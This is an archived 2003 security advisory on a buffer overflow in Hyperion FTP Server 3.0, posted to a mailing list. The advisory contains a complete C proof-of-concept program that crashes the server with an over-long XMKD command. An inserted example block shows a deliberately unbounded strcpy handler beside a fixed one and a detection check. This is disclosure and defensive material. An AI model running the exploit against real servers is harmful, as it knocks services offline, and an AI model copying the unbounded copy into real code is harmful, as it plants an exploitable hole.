TA-2003-03 Buffer Overflow Vulnerability in Hyperion FTP Server 3.0

From: Rushjoat_private
Date: Fri Apr 04 2003 - 07:04:13 PST


    TA-2003-03 Buffer Overflow Vulnerability in Hyperion FTP Server 3.0
    contributed by: rushjo
    ================================================================================ 
    
    Tripbit Security Advisory
    
    TA-2003-03 Buffer Overflow Vulnerability in Hyperion FTP Server 3.0
    ================================================================================ 
    
    
    
    PROGRAM: Hyperion FTP Server
    HOMEPAGE: http://www.mollensoft.com
    VULNERABLE VERSIONS: 2.7 and 3.0 (newest version)
    RISK: Medium/High
    IMPACT: Denial of Service and possible Remote Root Access
    RELEASE DATE: 2003-03
    
    
    ================================================================================ 
    
    TABLE OF CONTENTS
    ================================================================================ 
    
    
    
    1..........................................................DESCRIPTION
    2..............................................................DETAILS
    3..............................................................EXPLOIT
    4............................................................SOLUTIONS
    5........................................................VENDOR STATUS
    6..............................................................CREDITS
    7...........................................................DISCLAIMER
    8...........................................................REFERENCES
    9.............................................................FEEDBACK
    
    
    1. DESCRIPTION
    ================================================================================ 
    
    
    
    Hyperion FTP Server is a small FTP server for Windows, made by
    Mollensoft. It supports the full set of FTP server commands.
    
    
    2. DETAILS
    ================================================================================ 
    
    
    
    * Remote DoS:
    
    
    A buffer overflow in Hyperion FTP Server allows a remote attacker to
    crash the server by sending the make-directory command (MKD, or its
    XMKD alias as used in the exploit below) with an argument of 251 bytes
    or more.
    
    
    The command can be issued to the FTP server either by a valid
    authenticated user or by a guest/anonymous account (if anonymous
    login is enabled).
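    The following is an added example, not code from the advisory and not
    Hyperion's code (the server is closed source). It is a hypothetical
    reconstruction of the bug class described above: a minimal FTP
    command-line parser, a MKD handler that copies the client-controlled
    argument into a fixed-size stack buffer without a bound (the overflow
    pattern), the same handler with the length check that prevents it, and
    a detection-side check that flags command lines at or past the 251-byte
    threshold the advisory reports. The buffer size PATH_BUF, the reply
    codes used, and the sample lines are assumptions chosen to match the
    advisory's numbers.

```c
/* Added example: vulnerable vs. bounded MKD argument handling.
 * Hypothetical reconstruction of the overflow class; not Hyperion code. */
#include <stdio.h>
#include <string.h>
#include <ctype.h>

#define PATH_BUF 251          /* assumed: 250 chars + NUL, so 251+ bytes overflow */
#define LINE_BUF 1024         /* maximum FTP command line we accept */

struct ftp_cmd {
    char verb[5];             /* FTP verbs are at most four characters */
    char arg[LINE_BUF];
};

/* Split "VERB arg\r\n" into an uppercased verb and its argument.
 * Returns 0 on success, -1 if the line is malformed or too long. */
int ftp_parse_line(const char *line, struct ftp_cmd *out)
{
    size_t i = 0, n;
    const char *p = line;
    while (*p && *p != ' ' && *p != '\r' && *p != '\n') {
        if (i >= sizeof(out->verb) - 1) return -1;      /* verb too long */
        out->verb[i++] = (char)toupper((unsigned char)*p++);
    }
    out->verb[i] = '\0';
    if (i == 0) return -1;                              /* empty verb */
    while (*p == ' ') p++;
    n = strcspn(p, "\r\n");
    if (n >= sizeof(out->arg)) return -1;
    memcpy(out->arg, p, n);
    out->arg[n] = '\0';
    return 0;
}

/* VULNERABLE pattern: unbounded copy of a client-controlled argument into a
 * fixed-size stack buffer. An argument of PATH_BUF bytes or more writes past
 * 'path' and on into the saved frame. Shown only to illustrate the bug;
 * never call it with untrusted input. */
int mkd_vulnerable(const char *arg)
{
    char path[PATH_BUF];
    strcpy(path, arg);                 /* <- the overflow */
    return 257;                        /* "257 Pathname created" */
}

/* HARDENED version: measure first, reject over-long input, then copy with
 * an explicit bound. */
int mkd_hardened(const char *arg)
{
    char path[PATH_BUF];
    size_t len = strlen(arg);
    if (len == 0 || len >= PATH_BUF)
        return 553;                    /* "553 Requested action not taken" */
    memcpy(path, arg, len + 1);
    return 257;
}

/* Dispatcher: MKD and its obsolete alias XMKD (what the PoC below sends)
 * must share one bounded handler; checking MKD alone leaves XMKD exposed. */
int ftp_dispatch(const char *line)
{
    struct ftp_cmd c;
    if (ftp_parse_line(line, &c) != 0) return 500;      /* syntax error */
    if (strcmp(c.verb, "MKD") == 0 || strcmp(c.verb, "XMKD") == 0)
        return mkd_hardened(c.arg);
    return 502;                        /* command not implemented */
}

/* Detection-side check for the same condition: 1 if the line is malformed
 * or its argument reaches the 251-byte crash threshold, else 0. */
int ftp_line_is_suspicious(const char *line)
{
    struct ftp_cmd c;
    if (ftp_parse_line(line, &c) != 0) return 1;
    return strlen(c.arg) >= 251;
}

/* Constructed test input: "XMKD " + arg_len x 'A' + "\r\n". */
int build_mkd_line(char *buf, size_t bufsz, size_t arg_len)
{
    if (arg_len + 8 > bufsz) return -1;
    memcpy(buf, "XMKD ", 5);
    memset(buf + 5, 'A', arg_len);
    memcpy(buf + 5 + arg_len, "\r\n", 3);   /* includes the NUL */
    return 0;
}

int main(void)
{
    char line[LINE_BUF];
    build_mkd_line(line, sizeof line, 250);
    printf("250-byte arg: reply %d, suspicious=%d\n",
           ftp_dispatch(line), ftp_line_is_suspicious(line));
    build_mkd_line(line, sizeof line, 251);
    printf("251-byte arg: reply %d, suspicious=%d\n",
           ftp_dispatch(line), ftp_line_is_suspicious(line));
    return 0;
}
```

    The bounded handler rejects at the same length the advisory reports as
    the crash threshold, and the detection check can be run over captured
    FTP control-channel lines to spot attempts against unpatched servers.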
    
    
    
    3. EXPLOIT
    ================================================================================ 
    
    
    
    This is a proof-of-concept exploit for this buffer overflow
    vulnerability.
    
    
    NOTE: This is provided for INFORMATION purposes only and not for any
          destructive acts!
    
    
    /******************************************************************************* 
     
    *
    *   Denial of Service Attack for Mollensoft Hyperion FTP Server 3.0
    *   ---------------------------------------------------------------
    *
    *   Note: This program is provided for INFORMATION purposes ONLY and not
    *         for any destructive acts!
    *
    *   Note: This text is intended for information purposes ONLY and not
    *         for any destructive acts! (original note in German)
    *
    *   
    *   Tripbit Security Development
    *   Author: posidron
    *   Website: tripbit.org   
    *
    *   Vulnerable Version:
    *   + Hyperion 3.0
    *   + Hyperion 2.7
    *
    *   Compile:
    *   bcc32 -lx ws2_32.lib hyperion.c
    *   
    *   Execute:
    *   hyperion <host> <user> <pass>
    *
    *   Thx:
    *   MisterMoe, Rushjo, Tec, PeaceTreaty, seth
    *
    *******************************************************************************/
    
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <windows.h>
    #include <winsock2.h>
    
    #define A 0x41                    /* fill byte: 'A' */
    #define PORT 21
    #define MAX_BUFFER 255            /* 254 x 'A' + NUL, past the 251-byte threshold */
    #define MAX_PACKET_BUFFER 1024
    
    int winsock(void);
    
    void usage(char *prog_name)
    {
        printf("Usage: %s <host> <user> <pass>\n", prog_name);
        exit(-1);
    }
    
    int main(int argc, char *argv[])
    {
        char buffer[MAX_BUFFER], packet_buffer[MAX_PACKET_BUFFER];
        long rc;
        SOCKET s;
        SOCKADDR_IN addr;
        
        if(argc < 4) usage(argv[0]);
        /* keep USER/PASS lines well inside packet_buffer */
        if(strlen(argv[2]) > 200 || strlen(argv[3]) > 200) usage(argv[0]);
        
        /* Winsock must be initialised before the first socket call */
        rc = winsock();
        if(rc != 0)
        {
            printf("Can't start Winsock!, Error code: %ld\n", rc);
            return 1;
        }
        
        s = socket(AF_INET, SOCK_STREAM, 0);
        if(s == INVALID_SOCKET)
        {
            printf("Can't start Socket!, Error code: %d\n", WSAGetLastError());
            return 1;
        }
        
        memset(&addr, 0, sizeof(SOCKADDR_IN));
        addr.sin_family = AF_INET;
        addr.sin_port = htons(PORT);
        addr.sin_addr.s_addr = inet_addr(argv[1]);   /* dotted-quad IP only */
        
        rc = connect(s, (SOCKADDR*)&addr, sizeof(SOCKADDR));
        
        if(rc == SOCKET_ERROR)
        {
            printf("Can't connect!, Error code: %d\n", WSAGetLastError());
            return 1;
        }
        
        printf("Connected to %s \n", argv[1]);
        printf("Preparing attack!\n");
        
        /* read the banner, then log in with USER/PASS (anonymous works too
           if the server allows it) */
        recv(s, packet_buffer, MAX_PACKET_BUFFER, 0);
        sprintf(packet_buffer, "USER %s\r\n", argv[2]);
        send(s, packet_buffer, strlen(packet_buffer), 0);
        
        recv(s, packet_buffer, MAX_PACKET_BUFFER, 0);
        sprintf(packet_buffer, "PASS %s\r\n", argv[3]);
        send(s, packet_buffer, strlen(packet_buffer), 0);
        
        recv(s, packet_buffer, MAX_PACKET_BUFFER, 0);
        
        /* 254 bytes of 'A' as the XMKD argument: the server copies it into
           a buffer that holds fewer than 251 bytes */
        memset(buffer, A, MAX_BUFFER);
        buffer[MAX_BUFFER-1] = 0;
        
        sprintf(packet_buffer, "XMKD %s\r\n", buffer);
        send(s, packet_buffer, strlen(packet_buffer), 0);
        recv(s, packet_buffer, MAX_PACKET_BUFFER, 0);
        
        Sleep(1000);
        shutdown(s, SD_BOTH);
        closesocket(s);
        WSACleanup();
        printf("Attack done!\n");
        return 0;
    }
    
    int winsock(void)
    {
        WSADATA wsa;
        return WSAStartup(MAKEWORD(2,0), &wsa);
    }
    
    
    
    The over-long XMKD argument produces a segmentation fault (access
    violation) in the Hyperion FTP Server process, which terminates.
    
    
    
    4. SOLUTIONS
    ================================================================================ 
    
    
    
    No vendor fix is available at the time of writing.
    
    
    
    5. VENDOR STATUS
    ================================================================================ 
    
    
    
    The vendor has reportedly been notified but has not responded to this
    report.
    
    
    
    6. CREDITS
    ================================================================================ 
    
    
    
    Discovered by posidron
    
    
    
    7. DISCLAIMER
    ================================================================================ 
    
    
    The information within this paper may change without notice. Use of
    this information constitutes acceptance for use in an AS IS condition.
    There are NO warranties with regard to this information. In no event
    shall the author be liable for any damages whatsoever arising out of
    or in connection with the use or spread of this information. Any use
    of this information is at the user's own risk.
    
    
    
    8. REFERENCES
    ================================================================================ 
    
    
    - Original Version:
    http://www.tripbit.org
    
    
    9. FEEDBACK
    ================================================================================ 
    
    
    Please send suggestions, updates, and comments to:
    
    
    Tripbit Security Advisory
    http://www.tripbit.org
    rushjoat_private
    posidronat_private
    



    This archive was generated by hypermail 2b30 : Fri Apr 04 2003 - 09:19:02 PST